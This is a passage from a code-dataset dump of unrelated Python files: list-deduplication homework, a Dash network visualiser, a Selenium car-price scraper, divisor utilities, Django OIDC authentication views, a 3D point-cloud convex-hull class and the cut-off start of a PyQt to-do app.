[1, 2, 4, 5, 6, 2, 5, 2], нужно получить lst2 = [1, 2, 4, 5, 6]\n# б) элементы исходного списка, которые не имеют повторений:\n# например, lst = [1 , 2, 4, 5, 6, 2, 5, 2], нужно получить lst2 = [1, 4, 6]\n# Решение a)\n\nlst1 = [1, 2, 4, 5, 6, 2, 5, 5, 2, 2]\nprint(\"Дан список, заполненный произвольными целыми числами = \", lst1)\nlst2 = []\nlst3 = []\nfor i in lst1:\n if i not in lst2:\n lst2.append(i)\nprint(\"Новый список неповторяющихся элементов исходного списка = \", lst2)\nfor i in lst1:\n if lst1.count(i) == 1:\n lst3.append(i)\nprint(\"Новый список в котором нет повторяющихся элементов = \", lst3)\n\n\nmy_list = [1, 2, 4, 5, 6, 2, 5, 2]\nnew_list = set(my_list)\nprint(new_list)\n# Решение б)\nnext_list = []\nfor item in my_list:\n if my_list.count(item) == 1:\n next_list.append(item)\nprint(next_list)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"lesson02/home_work/hw02_normal.py","file_name":"hw02_normal.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"462899134","text":"\"\"\"\nAuthor: Mohit Mayank\n\nMain class for Jaal network visualization dashboard\n\"\"\"\n# import\nimport dash\nimport visdcc\nimport pandas as pd\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.exceptions import PreventUpdate\nfrom dash.dependencies import Input, Output, State\nfrom .datasets.parse_dataframe import parse_dataframe\nfrom .layout import get_app_layout, get_distinct_colors, create_color_legend, DEFAULT_COLOR\n\n# class\nclass Jaal:\n \"\"\"The main visualization class\n \"\"\"\n def __init__(self, edge_df, node_df=None):\n \"\"\"\n Parameters\n -------------\n edge_df: pandas dataframe\n The network edge data stored in format of pandas dataframe\n\n node_df: pandas dataframe (optional)\n The network node data stored in format of pandas dataframe\n \"\"\"\n print(\"Parsing the data...\", end=\"\")\n self.data = parse_dataframe(edge_df, node_df)\n self.filtered_data = self.data.copy()\n self.node_value_color_mapping = {}\n self.edge_value_color_mapping = {}\n print(\"Done\")\n\n def _callback_search_graph(self, graph_data, search_text):\n \"\"\"Highlight the nodes which match the search text\n \"\"\"\n nodes = graph_data['nodes']\n for node in nodes:\n if search_text not in node['label'].lower():\n node['color'] = '#f4f8fe'\n else:\n node['color'] = DEFAULT_COLOR\n graph_data['nodes'] = nodes\n return graph_data\n\n def _callback_filter_nodes(self, graph_data, filter_nodes_text):\n \"\"\"\n \"\"\"\n self.filtered_data = self.data.copy()\n node_df = pd.DataFrame(self.filtered_data['nodes'])\n try:\n node_list = node_df.query(filter_nodes_text)['id'].tolist()\n nodes = []\n for node in self.filtered_data['nodes']:\n if node['id'] in node_list:\n nodes.append(node)\n self.filtered_data['nodes'] = nodes\n graph_data = self.filtered_data\n except:\n graph_data = self.data\n print(\"wrong node filter query!!\")\n return graph_data\n\n def _callback_filter_edges(self, graph_data, filter_edges_text):\n self.filtered_data = self.data.copy()\n edges_df = pd.DataFrame(self.filtered_data['edges'])\n try:\n edges_list = edges_df.query(filter_edges_text)['id'].tolist()\n edges = []\n for edge in self.filtered_data['edges']:\n if edge['id'] in edges_list:\n edges.append(edge)\n self.filtered_data['edges'] = edges\n graph_data = self.filtered_data\n except:\n graph_data = self.data\n print(\"wrong edge filter query!!\")\n return graph_data\n\n def _callback_color_nodes(self, graph_data, color_nodes_value):\n value_color_mapping = {}\n # color option is None, revert back all changes\n if color_nodes_value == 'None':\n # revert to default color\n for node in self.data['nodes']:\n node['color'] = DEFAULT_COLOR\n else:\n print(\"inside color node\", color_nodes_value)\n unique_values = pd.DataFrame(self.data['nodes'])[color_nodes_value].unique()\n colors = get_distinct_colors(len(unique_values))\n value_color_mapping = {x:y for x, y in zip(unique_values, colors)}\n for node in self.data['nodes']:\n node['color'] = value_color_mapping[node[color_nodes_value]]\n # filter the data currently shown\n filtered_nodes = [x['id'] for x in self.filtered_data['nodes']]\n self.filtered_data['nodes'] = [x for x in self.data['nodes'] if x['id'] in filtered_nodes]\n graph_data = self.filtered_data\n return graph_data, value_color_mapping\n\n def _callback_color_edges(self, graph_data, color_edges_value):\n value_color_mapping = {}\n # color option is None, revert back all changes\n if color_edges_value == 'None':\n # revert to default color\n for edge in self.data['edges']:\n edge['color']['color'] = DEFAULT_COLOR\n else:\n print(\"inside color edge\", color_edges_value)\n unique_values = pd.DataFrame(self.data['edges'])[color_edges_value].unique()\n colors = get_distinct_colors(len(unique_values))\n value_color_mapping = {x:y for x, y in zip(unique_values, colors)}\n for edge in self.data['edges']:\n edge['color']['color'] = value_color_mapping[edge[color_edges_value]]\n # filter the data currently shown\n filtered_edges = [x['id'] for x in self.filtered_data['edges']]\n self.filtered_data['edges'] = [x for x in self.data['edges'] if x['id'] in filtered_edges]\n graph_data = self.filtered_data\n return graph_data, value_color_mapping\n\n def get_color_popover_legend_children(self, node_value_color_mapping={}, edge_value_color_mapping={}):\n \"\"\"Get the popover legends for node and edge based on the color setting\n \"\"\"\n # var\n popover_legend_children = []\n\n # common function\n def create_legends_for(title=\"Node\", legends={}):\n # add title\n _popover_legend_children = [dbc.PopoverHeader(f\"{title} legends\")]\n # add values if present\n if len(legends) > 0:\n for key, value in legends.items():\n _popover_legend_children.append(\n # dbc.PopoverBody(f\"Key: {key}, Value: {value}\")\n create_color_legend(key, value)\n )\n else: # otherwise add filler\n _popover_legend_children.append(dbc.PopoverBody(f\"no {title.lower()} colored!\"))\n #\n return _popover_legend_children\n\n # add node color legends\n popover_legend_children.extend(create_legends_for(\"Node\", node_value_color_mapping))\n # add edge color legends\n popover_legend_children.extend(create_legends_for(\"Edge\", edge_value_color_mapping))\n #\n return popover_legend_children\n\n def plot(self, debug=False, host=\"127.0.0.1\", port=\"8050\", directed=False, vis_opts=None):\n \"\"\"Plot the network by running the Dash server\n\n Parameter\n ----------\n debug (boolean)\n run the debug instance of Dash?\n\n host: string\n ip address on which to run the dash server (default: 127.0.0.1)\n\n port: string\n port on which to expose the dash server (default: 8050)\n\n directed: boolean\n process the graph as directed graph?\n \"\"\"\n # create the app\n app = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])\n\n # define layout\n app.layout = get_app_layout(self.data, color_legends=self.get_color_popover_legend_children(), directed=directed, vis_opts=vis_opts)\n\n # create callbacks to toggle legend popover\n @app.callback(\n Output(\"color-legend-popup\", \"is_open\"),\n [Input(\"color-legend-toggle\", \"n_clicks\")],\n [State(\"color-legend-popup\", \"is_open\")],\n )\n def toggle_popover(n, is_open):\n if n:\n return not is_open\n return is_open\n\n # create the main callbacks\n @app.callback(\n [Output('graph', 'data'), Output('color-legend-popup', 'children')],\n [Input('search_graph', 'value'),\n Input('filter_nodes', 'value'),\n Input('filter_edges', 'value'),\n Input('color_nodes', 'value'),\n Input('color_edges', 'value')],\n state=State('graph', 'data')\n )\n def setting_pane_callback(search_text, filter_nodes_text, filter_edges_text, color_nodes_value, color_edges_value, graph_data):\n # fetch the id of option which triggered\n ctx = dash.callback_context\n # if its the first call\n if not ctx.triggered:\n print(\"No trigger\")\n return [self.data, self.get_color_popover_legend_children()]\n else:\n # find the id of the option which was triggered\n input_id = ctx.triggered[0]['prop_id'].split('.')[0]\n # perform operation in case of search graph option\n if input_id == \"search_graph\":\n graph_data = self._callback_search_graph(graph_data, search_text)\n # In case filter nodes was triggered\n elif input_id == 'filter_nodes':\n graph_data = self._callback_filter_nodes(graph_data, filter_nodes_text)\n # In case filter edges was triggered\n elif input_id == 'filter_edges':\n graph_data = self._callback_filter_edges(graph_data, filter_edges_text)\n # If color node text is provided\n if input_id == 'color_nodes':\n graph_data, self.node_value_color_mapping = self._callback_color_nodes(graph_data, color_nodes_value)\n # If color edge text is provided\n if input_id == 'color_edges':\n graph_data, self.edge_value_color_mapping = self._callback_color_edges(graph_data, color_edges_value)\n # create the color legend childrens\n color_popover_legend_children = self.get_color_popover_legend_children(self.node_value_color_mapping, self.edge_value_color_mapping)\n # finally return the modified data\n return [graph_data, color_popover_legend_children]\n # run the server\n app.run_server(debug=debug, host=host, port=port)\n","sub_path":"jaal/jaal.py","file_name":"jaal.py","file_ext":"py","file_size_in_byte":9818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"495712809","text":"'''\nCreated on July 10, 2020\n@author: DNP Enterprises Inc.\n'''\nfrom datetime import datetime\nfrom time import sleep\nimport re\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom Quotes.Excel_utils2 import Excel_utils2\nfrom Cars.CreateDealerSheet2 import CreateDealerSheet\n\nif __name__ == '__main__':\n file_in = 'C:/Users/Home/Desktop/Cars/CarData.xlsx'\n file_out = 'C:/Users/Home/Desktop/Cars/Ford/CarPrices-DonWayFord.xlsx'\n data_in = Excel_utils2(file_in, 'FordDealers', 'in')\n dealer = data_in.sht.cell(3,1).value\n url = data_in.sht.cell(3,2).value\n #url = \"https://www.donwayford.com/vehicles/used/?st=year,desc&view=grid&sc=used\"\n \n date_time = datetime.now().strftime('%Y-%B-%d %I:%M %p') # get the date and time\n data_out = Excel_utils2(' ', dealer, 'out') # set the spreadsheet tab to the dealer name\n\n browser = \"C:\\\\Selenium\\\\chromedriver.exe\"\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--incognito\")\n driver = webdriver.Chrome(browser) # Open Chrome\n driver.maximize_window() # maximize the browser window\n \n driver.get(url) # Navigate to the test website\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".srp__found-header\")))\n print (driver.title)\n num_cars = driver.find_element_by_css_selector(\".srp__found-header\").text\n num_cars = int(re.sub(\"[^0-9]\", \"\", num_cars)) #remove text, keep the numeric part, and convert to integer for later use\n print (\"Number of cars found on site: \" , num_cars)\n \n for scroll in range(5):\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\") # Scroll to the bottom of the page\n sleep (1)\n \n car_details = driver.find_elements_by_css_selector('.vehicle-card__details')\n zero = 0\n count = 0\n car_info = []\n for index, car in enumerate(car_details):\n car_text = car.find_elements_by_css_selector('.vehicle-card__title')\n car_desc = car_text[0].text\n car_desc = (car_desc +\" \").split()[:3] # keep the year, make, and model, remove the rest\n car_desc = ' ' .join(car_desc) # convert the list to a string for later\n\n no_price = car.find_elements_by_css_selector('.vehicle-card__no-price') # if there's no price there's a different css selector used\n if len(no_price) >0:\n price = \"0\"\n zero += 1\n \n raw_price = car.find_elements_by_css_selector('.aifs')\n if len(raw_price) >0:\n price = raw_price[0].text\n price = re.sub(\"[$,]\", \"\", price) # remove $ and commas from the prices so that they're numeric\n price = price.strip('\\n') # remove carriage return from price\n count += 1\n\n car_info.append((car_desc + \" \" + price).split())\n \n print (\"Priced cars: \", count, \"Unpriced cars: \", zero)\n\n car_info = sorted(car_info)\n for index, i in enumerate(car_info):\n print (index, \":\", i)\n \n print (\"Saving data in a spreadsheet....\")\n CreateDealerSheet(data_out, car_info, date_time)\n print (dealer, \"Total cars: \" , count+zero)\n data_out.save_file(file_out)\n driver.quit() # Close the browser and end the session\n","sub_path":"CarData/src/Archives/Car_data_DonWayFord_old2.py","file_name":"Car_data_DonWayFord_old2.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"434729376","text":"# Необходимо реализовать модуль divisor_master. Все функции модуля принимают на вход натуральные числа от 1 до 1000./\n# Модуль содержит функции:\n# 1) проверка числа на простоту (простые числа - это те числа у которых делители единица и они сами)\n\ndef one(x):\n for k in range(2,x):\n if x%k == 0:\n # print(k)\n return 0\n return 1\n\n\n# 2) выводит список всех делителей числа\n\ndef two(x):\n list_ = []\n for k in range(1,x+1):\n if x%k == 0:\n list_.append(k)\n return list_\n\n\n# 3) выводит самый большой простой делитель числа\n\ndef three(x):\n max_ = 1\n for k in range(1,x+1):\n if x%k == 0:\n if one(k) == 1:\n max_ = k\n return max_\n\n\n# 4) функция выводит каноническое разложение числа на простые множители\n\ndef four(x):\n list_num = []\n k = 2\n while k*k<=x:\n while x%k == 0:\n x = x/k\n list_num.append(k)\n k = k + 1\n if x>1:\n list_num.append(int(x))\n return list_num\n\n\n# 5) функция выводит самый большой делитель (не обязательно простой) числа\n# Кроме самого исходного числа\n\ndef five(x):\n max_ = 1\n for k in range(1,x):\n if x%k == 0:\n max_ = k\n return max_","sub_path":"lesson_5_module.py","file_name":"lesson_5_module.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454886726","text":"from pydoc import locate\nfrom urllib.parse import parse_qs, urlparse\n\nfrom django.conf import settings\nfrom django.contrib.auth import logout as auth_logout\nfrom django.http import HttpResponse, HttpResponseBadRequest\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom django.utils.decorators import method_decorator\nfrom django.utils.http import urlencode\nfrom django.views.generic import View\nfrom django.views.generic.base import TemplateView\nfrom django.views.decorators.cache import never_cache\nfrom django.views.decorators.clickjacking import xframe_options_exempt\nfrom jwkest.jws import JWT\nfrom oauth2_provider.models import get_application_model\nfrom oidc_provider.lib.endpoints.authorize import AuthorizeEndpoint\nfrom oidc_provider.lib.endpoints.token import TokenEndpoint\nfrom oidc_provider.lib import errors as oidc_errors\nfrom oidc_provider.models import Client\nfrom oidc_provider.views import AuthorizeView, EndSessionView\nfrom social_django.models import UserSocialAuth\nfrom social_django.utils import load_backend, load_strategy\n\nfrom tunnistamo import auditlog\nfrom oidc_apis.models import ApiScope\n\nfrom .models import LoginMethod, OidcClientOptions\n\n\n# This is used to pass the request query dict to the OIDC endpoint\nclass DummyRequest:\n def __init__(self, query_dict):\n self.GET = query_dict\n self.method = 'GET'\n\n\ndef get_return_to_rp_uri(request, redirect_uri_params):\n \"\"\"Returns an URI to redirect the browser to if user cancels authentication\n \"\"\"\n\n params = {key: val[0] for key, val in redirect_uri_params.items()}\n dummy_request = DummyRequest(params)\n authorize = AuthorizeEndpoint(dummy_request)\n try:\n # This will make sure redirect URI is valid.\n authorize.validate_params()\n except (\n oidc_errors.ClientIdError, oidc_errors.RedirectUriError, oidc_errors.AuthorizeError\n ):\n return None\n\n cancel_error = oidc_errors.AuthorizeError(\n authorize.params['redirect_uri'], 'access_denied', authorize.grant_type\n )\n return_uri = cancel_error.create_uri(\n authorize.params['redirect_uri'],\n authorize.params['state']\n )\n return return_uri\n\n\nclass LoginView(TemplateView):\n template_name = \"login.html\"\n\n def get_login_methods(self, request, allowed_methods, redirect_uri):\n methods = []\n for m in allowed_methods:\n assert isinstance(m, LoginMethod)\n\n begin_url = reverse('social:begin', kwargs={'backend': m.provider_id})\n\n url_params = {}\n if redirect_uri:\n url_params['next'] = redirect_uri\n\n backend = load_backend(load_strategy(request), m.provider_id, redirect_uri=None)\n if hasattr(backend, 'get_allowed_idp_name'):\n idp_name = backend.get_allowed_idp_name(request)\n url_params['idp'] = idp_name\n\n if url_params:\n begin_url += '?' + urlencode(url_params)\n\n m.login_url = begin_url\n methods.append(m)\n\n return methods\n\n @method_decorator(never_cache)\n def get(self, request, *args, **kwargs): # noqa (too complex)\n # Log the user out first so that we don't end up in the PSA \"connect\"\n # flow.\n auditlog.log_login(request)\n\n if self.request.user.is_authenticated:\n auth_logout(self.request)\n\n next_url = request.GET.get('next')\n app = None\n oidc_client = None\n authorize_uri_params = None\n self.return_to_rp_uri = None\n\n if next_url:\n # Determine application from the 'next' query argument.\n # FIXME: There should be a better way to get the app id.\n authorize_uri_params = parse_qs(urlparse(next_url).query)\n client_id = authorize_uri_params.get('client_id')\n\n if client_id and len(client_id):\n client_id = client_id[0].strip()\n\n if client_id:\n try:\n app = get_application_model().objects.get(client_id=client_id)\n except get_application_model().DoesNotExist:\n pass\n\n try:\n oidc_client = Client.objects.get(client_id=client_id)\n except Client.DoesNotExist:\n pass\n\n allowed_methods = None\n if app:\n allowed_methods = app.login_methods.all()\n elif oidc_client:\n try:\n client_options = OidcClientOptions.objects.get(oidc_client=oidc_client)\n allowed_methods = client_options.login_methods.all()\n except OidcClientOptions.DoesNotExist:\n pass\n\n self.return_to_rp_uri = get_return_to_rp_uri(request, authorize_uri_params)\n\n if allowed_methods is None:\n # Only allow the methods that do not require registered clients\n # (this might happen when a browser enters LoginView directly for\n # testing purposes).\n allowed_methods = LoginMethod.objects.filter(require_registered_client=False)\n\n login_methods = self.get_login_methods(request, allowed_methods, next_url)\n\n if len(login_methods) == 1:\n return redirect(login_methods[0].login_url)\n\n self.login_methods = login_methods\n return super(LoginView, self).get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(LoginView, self).get_context_data(**kwargs)\n context['login_methods'] = self.login_methods\n context['return_to_rp_uri'] = self.return_to_rp_uri\n return context\n\n\ndef _process_uris(uris):\n if isinstance(uris, list):\n return uris\n return uris.splitlines()\n\n\ndef create_logout_response(request, user, backend_name, redirect_uri):\n backend = load_backend(load_strategy(request), backend_name, redirect_uri=None)\n\n # social_auth creates a new user for each (provider, uid) pair so\n # we don't need to worry about duplicates\n try:\n social_user = UserSocialAuth.objects.get(user=user, provider=backend_name)\n except UserSocialAuth.DoesNotExist:\n return None\n\n if not hasattr(backend, 'create_logout_response'):\n return None\n\n return backend.create_logout_response(social_user, redirect_uri)\n\n\nclass LogoutView(TemplateView):\n template_name = 'logout_done.html'\n\n def _validate_client_uri(self, uri):\n \"\"\"Valid post logout URIs are explicitly managed in the database via\n the admin UI as linefeed-separated text fields of one or\n several URIs.\n\n This method treats all URIs of all OAuth apps and OIDC Clients\n as valid for any logout request.\n \"\"\"\n if uri is None or uri == '':\n return False\n\n uri_texts = list()\n for manager in [get_application_model().objects, Client.objects]:\n for o in manager.all():\n value = o.post_logout_redirect_uris\n if value is None or len(value) == 0:\n continue\n uri_texts.append(value)\n\n return uri in (u for uri_text in uri_texts for u in _process_uris(uri_text))\n\n def get(self, *args, **kwargs):\n user = self.request.user\n backend_name = None\n if user.is_authenticated:\n backend_name = self.request.session.get('social_auth_last_login_backend', None)\n\n if self.request.user.is_authenticated:\n auth_logout(self.request)\n\n uri = self.request.GET.get('next')\n if self._validate_client_uri(uri):\n return redirect(uri)\n\n redirect_uri = self.request.GET.get('next')\n if redirect_uri and not self._validate_client_uri(redirect_uri):\n redirect_uri = None\n\n if backend_name:\n logout_response = create_logout_response(\n self.request, user, backend_name, redirect_uri\n )\n if logout_response is not None:\n return logout_response\n\n if redirect_uri:\n return redirect(redirect_uri)\n\n return super(LogoutView, self).get(*args, **kwargs)\n\n\nclass AuthenticationErrorView(TemplateView):\n template_name = 'account/signup_closed.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass TunnistamoOidcAuthorizeView(AuthorizeView):\n # AuthorizeView needs to be exempt from the default of X-Frame-Options: DENY\n # because it is placed in an iframe when a public client does silent renew.\n # We are ensuring redirect_uri matches, which will give protection against\n # clickjacking.\n @method_decorator(xframe_options_exempt)\n def get(self, request, *args, **kwargs):\n auditlog.log_authorize(request)\n\n if request.user.is_authenticated:\n # Refresh the session for each authorize call\n request.session.modified = True\n\n #\n # TODO: Check for requested ACR, logout if incompatible\n #\n\n request.GET = _extend_scope_in_query_params(request.GET)\n request_locales = [l.strip() for l in request.GET.get('ui_locales', '').split(' ') if l]\n available_locales = [l[0] for l in settings.LANGUAGES]\n\n for locale in request_locales:\n if locale in available_locales:\n break\n else:\n locale = None\n\n if locale:\n translation.activate(locale)\n\n resp = super().get(request, *args, **kwargs)\n if locale:\n # Save the UI language in a dedicated cookie, because the\n # session will be nuked if we go through the login view.\n resp.set_cookie(\n settings.LANGUAGE_COOKIE_NAME, locale,\n max_age=settings.LANGUAGE_COOKIE_AGE,\n path=settings.LANGUAGE_COOKIE_PATH,\n domain=settings.LANGUAGE_COOKIE_DOMAIN,\n )\n return resp\n\n def post(self, request, *args, **kwargs):\n request.POST = _extend_scope_in_query_params(request.POST)\n return super().post(request, *args, **kwargs)\n\n\nclass TunnistamoOidcEndSessionView(EndSessionView):\n def dispatch(self, request, *args, **kwargs):\n auditlog.log_end_session(request)\n\n backend_name = None\n user = request.user\n if user.is_authenticated:\n backend_name = self.request.session.get('social_auth_last_login_backend', None)\n\n # clear Django session and get redirect URL\n response = super().dispatch(request, *args, **kwargs)\n\n if backend_name is not None:\n # If the backend supports logout, ask it to generate a logout\n # response to pass to the browser.\n backend_response = create_logout_response(request, user, backend_name, response.url)\n if backend_response is not None:\n response = backend_response\n\n return response\n\n\nclass TunnistamoOidcTokenView(View):\n def post(self, request, *args, **kwargs):\n auditlog.log_token_retrieval(request)\n token = TokenEndpoint(request)\n\n try:\n token.validate_params()\n\n dic = token.create_response_dic()\n\n # Django OIDC Provider doesn't support refresh token expiration (#230).\n # We don't supply refresh tokens when using restricted authentication methods.\n amr = JWT().unpack(dic['id_token']).payload().get('amr', '')\n for restricted_auth in settings.RESTRICTED_AUTHENTICATION_BACKENDS:\n if amr == locate(restricted_auth).name:\n dic.pop('refresh_token')\n break\n\n response = TokenEndpoint.response(dic)\n return response\n except oidc_errors.TokenError as error:\n return TokenEndpoint.response(error.create_dict(), status=400)\n except oidc_errors.UserAuthError as error:\n return TokenEndpoint.response(error.create_dict(), status=403)\n\n\ndef _extend_scope_in_query_params(query_params):\n scope = query_params.get('scope')\n if scope:\n query_params = query_params.copy()\n query_params['scope'] = _add_api_scopes(scope)\n return query_params\n\n\ndef _add_api_scopes(scope_string):\n scopes = scope_string.split()\n extended_scopes = ApiScope.extend_scope(scopes)\n return ' '.join(extended_scopes)\n\n\ndef show_profile(request):\n ATTR_NAMES = ['first_name', 'last_name', 'email', 'birthdate']\n\n user = request.user\n if user.is_authenticated:\n attrs = {user._meta.get_field(x).verbose_name: getattr(user, x) for x in ATTR_NAMES}\n else:\n attrs = {}\n return render(request, 'account/profile.html', context=dict(attrs=attrs))\n\n\nclass RememberMeView(View):\n @never_cache\n def post(self, request, *args, **kwargs):\n remember_me = request.POST.get('remember_me', '')\n if not remember_me:\n return HttpResponseBadRequest()\n if remember_me.strip().lower() == 'true':\n remember_me = True\n else:\n remember_me = False\n\n session = request.session\n session['remember_me'] = remember_me\n\n return HttpResponse()\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"68615439","text":"# math3d_point_cloud.py\n\nimport random\n\nfrom math3d_side import Side\nfrom math3d_triangle import Triangle\nfrom math3d_vector import Vector\nfrom math3d_plane import Plane\n\nclass PointCloud(object):\n def __init__(self, point_list=None):\n self.point_list = point_list if point_list is not None else []\n\n def clone(self):\n return PointCloud([point for point in self.point_list])\n\n def to_dict(self):\n data = {\n 'point_list': [point.to_dict() for point in self.point_list]\n }\n return data\n \n def from_dict(self, data):\n self.point_list = [Vector().from_dict(point) for point in data.get('point_list', [])]\n return self\n\n def calc_center(self):\n center = Vector(0.0, 0.0, 0.0)\n for point in self.point_list:\n center = center + point\n center = center * (1.0 / float(len(self.point_list)))\n return center\n\n def scale_about_center(self, scale):\n center = self.calc_center()\n self.point_list = [center + (point - center) * scale for point in self.point_list]\n\n def add_point(self, new_point, eps=1e-7):\n for point in self.point_list:\n if (point - new_point).length() < eps:\n break\n else:\n self.point_list.append(new_point)\n\n def _find_initial_tetrahedron_for_convex_hull(self):\n for i in range(len(self.point_list)):\n point_a = self.point_list[i]\n for j in range(i + 1, len(self.point_list)):\n point_b = self.point_list[j]\n for k in range(j + 1, len(self.point_list)):\n point_c = self.point_list[k]\n for l in range(k + 1, len(self.point_list)):\n point_d = self.point_list[l]\n vec_a = point_a - point_d\n vec_b = point_b - point_d\n vec_c = point_c - point_d\n volume = vec_a.cross(vec_b).dot(vec_c)\n if volume > 0.0:\n return [\n Triangle(point_d, point_b, point_a),\n Triangle(point_d, point_c, point_b),\n Triangle(point_d, point_a, point_c),\n Triangle(point_a, point_b, point_c)\n ]\n \n def find_convex_hull(self, eps=1e-7):\n from math3d_triangle_mesh import TriangleMesh\n \n if len(self.point_list) < 4:\n raise Exception('The point-cloud must consist of at least 4 non-co-planar points.')\n \n triangle_list = self._find_initial_tetrahedron_for_convex_hull()\n tri_mesh = TriangleMesh().from_triangle_list(triangle_list)\n \n # Proceed by expanding the current convex hull until all points have been incorporated.\n point_list = [point for point in self.point_list]\n while True:\n \n # Remove any points that lie on or within the current convex hull.\n i = 0\n while i < len(point_list):\n point = point_list[i]\n if tri_mesh.side(point) == Side.BACK:\n del point_list[i]\n else:\n i += 1\n \n # We're done when all points have been incorporated into the hull.\n if len(point_list) == 0:\n break\n \n # Arbitrarily choose the first point in the list. We know it is outside the hull.\n new_point = point_list[0]\n tri_mesh.vertex_list.append(new_point)\n i = len(tri_mesh.vertex_list) - 1\n \n # Build upon any triangles that face toward our new point.\n triangle_list = [triangle for triangle in tri_mesh.triangle_list]\n for triple in triangle_list:\n triangle = tri_mesh.make_triangle(triple)\n plane = triangle.calc_plane()\n side = plane.side(new_point)\n if side == Side.FRONT:\n tri_mesh.toggle_triangle(triple, check_forward=True, check_reverse=False)\n tri_mesh.toggle_triangle((i, triple[0], triple[1]), check_forward=False, check_reverse=True)\n tri_mesh.toggle_triangle((i, triple[1], triple[2]), check_forward=False, check_reverse=True)\n tri_mesh.toggle_triangle((i, triple[2], triple[0]), check_forward=False, check_reverse=True)\n \n # Finally, return the convex hull.\n return tri_mesh\n \n def planar_sort(self, plane, eps=1e-7):\n back_list = []\n front_list = []\n neither_list = []\n for i, point in enumerate(self.point_list):\n side = plane.side(point, eps)\n if side == Side.BACK:\n back_list.append(i)\n elif side == Side.FRONT:\n front_list.append(i)\n elif side == Side.NEITHER:\n neither_list.append(i)\n return back_list, front_list, neither_list\n \n def fit_plane(self):\n # f(x,y,z) = ax + by + cz + d is the plane equation.\n # For m points {p_i}, we want to find coefficients a, b, c, d so\n # that all equations f(p_i)=0 are satisfied or as near satisfied\n # as they can be in the sense that |f(p_i)| are all minimized.\n # The least squares method has us define F(a,b,c,d) = Sum_i f^2(p_i),\n # and then we simply solve for a, b, c, d by setting each of\n # dF/da, dF/db, dF/dc, dF/dd to zero, which gives us a homogeneous\n # system of linear equations. We find a non-trivial solution by\n # looking for an eigenvector with the smallest associated value.\n import numpy\n \n matrix = [[0.0 for i in range(4)] for j in range(4)]\n \n sum_xx = sum([point.x * point.x for point in self.point_list])\n sum_yy = sum([point.y * point.y for point in self.point_list])\n sum_zz = sum([point.z * point.z for point in self.point_list])\n \n sum_xy = sum([point.x * point.y for point in self.point_list])\n sum_xz = sum([point.x * point.z for point in self.point_list])\n sum_yz = sum([point.y * point.z for point in self.point_list])\n \n sum_x = sum([point.x for point in self.point_list])\n sum_y = sum([point.y for point in self.point_list])\n sum_z = sum([point.z for point in self.point_list])\n\n matrix[0][0] = sum_xx\n matrix[0][1] = sum_xy\n matrix[0][2] = sum_xz\n matrix[0][3] = sum_x\n matrix[1][0] = sum_xy\n matrix[1][1] = sum_yy\n matrix[1][2] = sum_yz\n matrix[1][3] = sum_y\n matrix[2][0] = sum_xz\n matrix[2][1] = sum_yz\n matrix[2][2] = sum_zz\n matrix[2][3] = sum_z\n matrix[3][0] = sum_x\n matrix[3][1] = sum_y\n matrix[3][2] = sum_z\n matrix[3][3] = float(len(self.point_list))\n\n matrix = numpy.array(matrix)\n \n w, v = numpy.linalg.eig(matrix)\n \n j = -1\n eps = 1e-5\n smallest_value = None\n for i in range(4):\n value = w[i]\n if isinstance(value, complex):\n if abs(value.imag) > eps:\n continue # Only consider real eigen values.\n value = value.real\n if smallest_value is None or abs(value) < abs(smallest_value):\n smallest_value = value\n j = i\n \n normal = Vector(v[0][j], v[1][j], v[2][j])\n normal.x = normal.x.real if isinstance(normal.x, complex) else normal.x\n normal.y = normal.y.real if isinstance(normal.y, complex) else normal.y\n normal.z = normal.z.real if isinstance(normal.z, complex) else normal.z\n length = normal.length()\n unit_normal = normal / length\n alpha = v[3][j].real if isinstance(v[3][j], complex) else v[3][j]\n center = -(alpha / length) * unit_normal\n \n plane = Plane(center, unit_normal)\n return plane\n\n def render(self):\n from OpenGL.GL import GL_POINTS, glBegin, glEnd, glVertex3f\n\n glBegin(GL_POINTS)\n try:\n for point in self.point_list:\n glVertex3f(point.x, point.y, point.z)\n except Exception as ex:\n error = str(ex)\n error = None\n finally:\n glEnd()","sub_path":"math3d_point_cloud.py","file_name":"math3d_point_cloud.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"225374569","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom mainwindow import Ui_MainWindow\nfrom dialog import Ui_Dialog\nfrom stylesheets import main_style_sheet\nfrom stylesheets import dialog_style_sheet\n\n\nclass Dialog(QDialog):\n def __init__(self, parent=None):\n super(Dialog, self).__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.setStyleSheet(dialog_style_sheet)\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n # vip\n self.setupUi(self)\n self.new_task_btn.clicked.connect(self.add_stuff)\n self.done = []\n self.not_done = []\n\n self.done.clicked.connect(self.do_task)\n self.Undone.clicked.connect(self.undo_task)\n self.setStyleSheet(main_style_sheet)\n\n def 